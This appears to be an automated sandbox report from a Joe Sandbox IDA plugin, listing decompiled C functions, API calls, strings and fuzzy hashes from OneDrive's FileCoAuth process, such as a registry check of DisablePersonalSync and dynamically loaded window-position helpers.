    Uniqueness Score: -1,00%

    C-Code - Quality: 80%
    			E00E9E731(void* __ebx, signed int* __ecx, void* __edi, void* __esi, void* __eflags) {
    				signed int _t38;
    				signed int _t41;
    				signed int _t46;
    				signed int* _t48;
    				void* _t49;
    
    				_push(0x10);
    				E00EA31CA(E00EA4B73, __ebx, __edi, __esi);
    				_t48 = __ecx;
    				_push(0);
    				_t46 = E00E9A924( *(_t49 + 8));
    				 *(_t49 - 0x1c) = _t46;
    				 *(_t49 - 4) =  *(_t49 - 4) & 0x00000000;
    				E00E9B420(_t48,  *_t48, _t48[1], _t46);
    				 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
    				_t41 = _t48[1];
    				 *(_t49 - 0x18) = _t41;
    				_t38 =  *_t48;
    				asm("cdq");
    				 *(_t49 - 0x14) = 0x34;
    				 *(_t49 - 0x1c) = (_t41 - _t38) /  *(_t49 - 0x14);
    				if(_t38 != 0) {
    					if(_t38 != _t41) {
    						do {
    							E00E94F21(_t38);
    							_t38 = _t38 +  *(_t49 - 0x14);
    						} while (_t38 !=  *(_t49 - 0x18));
    					}
    					_push( *_t48);
    					L00EA29EC();
    				}
    				_t48[2] =  *(_t49 + 8) * 0x34 + _t46;
    				_t48[1] =  *(_t49 - 0x1c) * 0x34 + _t46;
    				 *_t48 = _t46;
    				return E00EA313E( *(_t49 - 0x1c) * 0x34 + _t46);
    			}

    APIs
    • __EH_prolog3_catch.LIBCMT ref: 00E9E738
      • Part of subcall function 00E9A924: ??2@YAPAXI@Z.MSVCR120 ref: 00E9A93D
      • Part of subcall function 00E9A924: ?_Xbad_alloc@std@@YAXXZ.MSVCP120 ref: 00E9A949
    • ??3@YAXPAX@Z.MSVCR120 ref: 00E9E796
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: ??2@??3@H_prolog3_catchXbad_alloc@std@@
    • String ID: 4
    • API String ID: 2700918851-4088798008
    • Opcode ID: e9256110979df66e445c30072064c7dc61d19eb737a5315d5383e3f461cadb65
    • Instruction ID: a366ef12e6380ba16ac63cad8afe21d5f0e63fb00284286183f8970611e7744d
    • Opcode Fuzzy Hash: e9256110979df66e445c30072064c7dc61d19eb737a5315d5383e3f461cadb65
    • Instruction Fuzzy Hash: 841161719013069BCF25DFA4C98276EBBF1AF98710F24A42DE291BB391D771AA01CF51
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 94%
    			E00EA1237(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    				void* _t25;
    				signed int _t29;
    				void* _t38;
    				void* _t39;
    
    				_t39 = __eflags;
    				_t37 = __esi;
    				_t36 = __edi;
    				_push(0x38);
    				E00EA3194(E00EA4D3D, __ebx, __edi, __esi);
    				_t29 = 0;
    				if(E00E9F38F(0, __edx, __edi, __esi, _t39) == 0) {
    					L3:
    					_t29 = 1;
    				} else {
    					 *((intOrPtr*)(_t38 - 0x44)) = 0;
    					E00E94E9D(_t38 - 0x40, L"DisablePersonalSync");
    					 *(_t38 - 4) = 0;
    					E00E94E9D(_t38 - 0x28, L"Software\\Microsoft\\OneDrive");
    					 *(_t38 - 4) = 1;
    					_t25 = E00E9F1E6(_t38 - 0x28, 0x80000001, _t38 - 0x28, _t38 - 0x40, 0, _t38 - 0x44);
    					_t37 = _t25;
    					 *(_t38 - 4) = 0;
    					E00E94307(_t38 - 0x28, 1, 0);
    					 *(_t38 - 4) =  *(_t38 - 4) | 0xffffffff;
    					E00E94307(_t38 - 0x40, 1, 0);
    					if(_t25 >= 0 &&  *((intOrPtr*)(_t38 - 0x44)) != 0) {
    						goto L3;
    					}
    				}
    				return E00EA3152(_t29, _t36, _t37);
    			}

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00EA123E
      • Part of subcall function 00E9F38F: __EH_prolog3_GS.LIBCMT ref: 00E9F396
      • Part of subcall function 00E9F1E6: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,00000008), ref: 00E9F215
      • Part of subcall function 00E9F1E6: RegQueryValueExW.ADVAPI32(00000008,?,00000000,?,?,00000004), ref: 00E9F252
      • Part of subcall function 00E9F1E6: RegCloseKey.ADVAPI32(00000008), ref: 00E9F280
      • Part of subcall function 00E94307: ??3@YAXPAX@Z.MSVCR120 ref: 00E94332
    Strings
    • DisablePersonalSync, xrefs: 00EA124E
    • Software\Microsoft\OneDrive, xrefs: 00EA1264
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: H_prolog3_$??3@CloseOpenQueryValue
    • String ID: DisablePersonalSync$Software\Microsoft\OneDrive
    • API String ID: 2364820520-1797031413
    • Opcode ID: 04f62807460e9a4a589a17b88c03f05debf721b9de2701d211cb9d66f4760c07
    • Instruction ID: 291145b5e9b8f8a39a7608db8cf4141782b3c8cc4f5bc36883d4029882b1c899
    • Opcode Fuzzy Hash: 04f62807460e9a4a589a17b88c03f05debf721b9de2701d211cb9d66f4760c07
    • Instruction Fuzzy Hash: 01017571D012089ECF10EBE0C941EDD77B8EF1A344F442569E501BB1C2D670AB46D761
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 42%
    			E00E97593(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
    				struct HINSTANCE__* _t10;
    				_Unknown_base(*)()* _t13;
    				void* _t16;
    
    				_push(L"User32.dll");
    				_t10 =  *((intOrPtr*)( *__ecx + 0x48))();
    				_t16 = 0;
    				if(_t10 != 0) {
    					_t13 = GetProcAddress(_t10, "CalculatePopupWindowPosition");
    					if(_t13 != 0) {
    						_t16 =  *_t13(_a4, _a8, _a12, _a16, _a20);
    					}
    				}
    				return 0 | _t16 != 0x00000000;
    			}

    APIs
    • GetProcAddress.KERNEL32(00000000,CalculatePopupWindowPosition), ref: 00E975AF
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: AddressProc
    • String ID: CalculatePopupWindowPosition$User32.dll
    • API String ID: 190572456-1235422894
    • Opcode ID: 1f0a8c0dce299313428f3242ccc9fd73c0213a8de26552b9c00ca4d1086b5ddf
    • Instruction ID: fb39d9b3e64a9636f605a39ae24c8fbd67db9cc8080a41aa976d1879068b80f4
    • Opcode Fuzzy Hash: 1f0a8c0dce299313428f3242ccc9fd73c0213a8de26552b9c00ca4d1086b5ddf
    • Instruction Fuzzy Hash: 28E0123251431AABCF119FE5DC05E9B3F9AAF4975470A8010BE54FA061D731DD60DBA0
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 42%
    			E00E97559(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
    				struct HINSTANCE__* _t5;
    				_Unknown_base(*)()* _t7;
    				void* _t10;
    
    				_push(L"Shell32.dll");
    				_t5 =  *((intOrPtr*)( *__ecx + 0x48))();
    				_t10 = 0x80004005;
    				if(_t5 != 0) {
    					_t7 = GetProcAddress(_t5, "Shell_NotifyIconGetRect");
    					if(_t7 != 0) {
    						_t10 =  *_t7(_a4, _a8);
    					}
    				}
    				return _t10;
    			}

    APIs
    • GetProcAddress.KERNEL32(00000000,Shell_NotifyIconGetRect), ref: 00E97578
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: AddressProc
    • String ID: Shell32.dll$Shell_NotifyIconGetRect
    • API String ID: 190572456-3914173280
    • Opcode ID: 22573b769a5289e6fcb786e1516614bf92594dff1d3e077f8ec8f15361b9cc0a
    • Instruction ID: 418a9f4f83624a09137e815440bea0d761c2b7b4275018f078c6933aef890220
    • Opcode Fuzzy Hash: 22573b769a5289e6fcb786e1516614bf92594dff1d3e077f8ec8f15361b9cc0a
    • Instruction Fuzzy Hash: 8FE08C323043146BCB50AAA99C08E9A3B99AF4A7A07068060BD58FB120DA31ED00CBA0
    Uniqueness

    Uniqueness Score: -1,00%

    APIs
    • ?_Syserror_map@std@@YAPBDH@Z.MSVCP120(?), ref: 00E92DD1
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: Syserror_map@std@@
    • String ID: @h$xh
    • API String ID: 1066479615-1883358580
    • Opcode ID: 1db1547d8595f1e65fe6b12d13862cd27411b91e45d12fa21aba03689e71529a
    • Instruction ID: 7a41778853bc7970a85b7621761d66b6173a49bd1b0a46f7e7a85f1cedfe59b6
    • Opcode Fuzzy Hash: 1db1547d8595f1e65fe6b12d13862cd27411b91e45d12fa21aba03689e71529a
    • Instruction Fuzzy Hash: C2D01232102114AF4B109F4998089D77FD8EE86765309D045F908AF120C770E9449FD4
    Uniqueness

    Uniqueness Score: -1,00%

    APIs
    • ?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z.LOGGINGPLATFORM(d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\syncenginefileinfoprovider.cpp,?,?,00EA7810,00C7B025,00000001,00000000,00000000), ref: 00E93DD2
    • ?LoggingRotateIfNeeded@@YGXXZ.LOGGINGPLATFORM(?,?,00EA7810,00C7B025,00000001,00000000,00000000), ref: 00E93DD8
    Strings
    • d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\syncenginefileinfoprovider.cpp, xrefs: 00E93DCD
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: LoggingStructured$EventEvent@@Needed@@Parameter@@@RotateWrite
    • String ID: d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\syncenginefileinfoprovider.cpp
    • API String ID: 2559330748-387945833
    • Opcode ID: 34119663de05aef27d88406779a2477e84351caa8a65feb62a384dea30402be8
    • Instruction ID: 191002afe24c8ab954e1f764e4749dca0dac93f76bf705d91c66e15311d0e803
    • Opcode Fuzzy Hash: 34119663de05aef27d88406779a2477e84351caa8a65feb62a384dea30402be8
    • Instruction Fuzzy Hash: 59D0C9712C43087BE62056529C0EF967E29D79FF11F148421B218380E286E278148658
    Uniqueness

    Uniqueness Score: -1,00%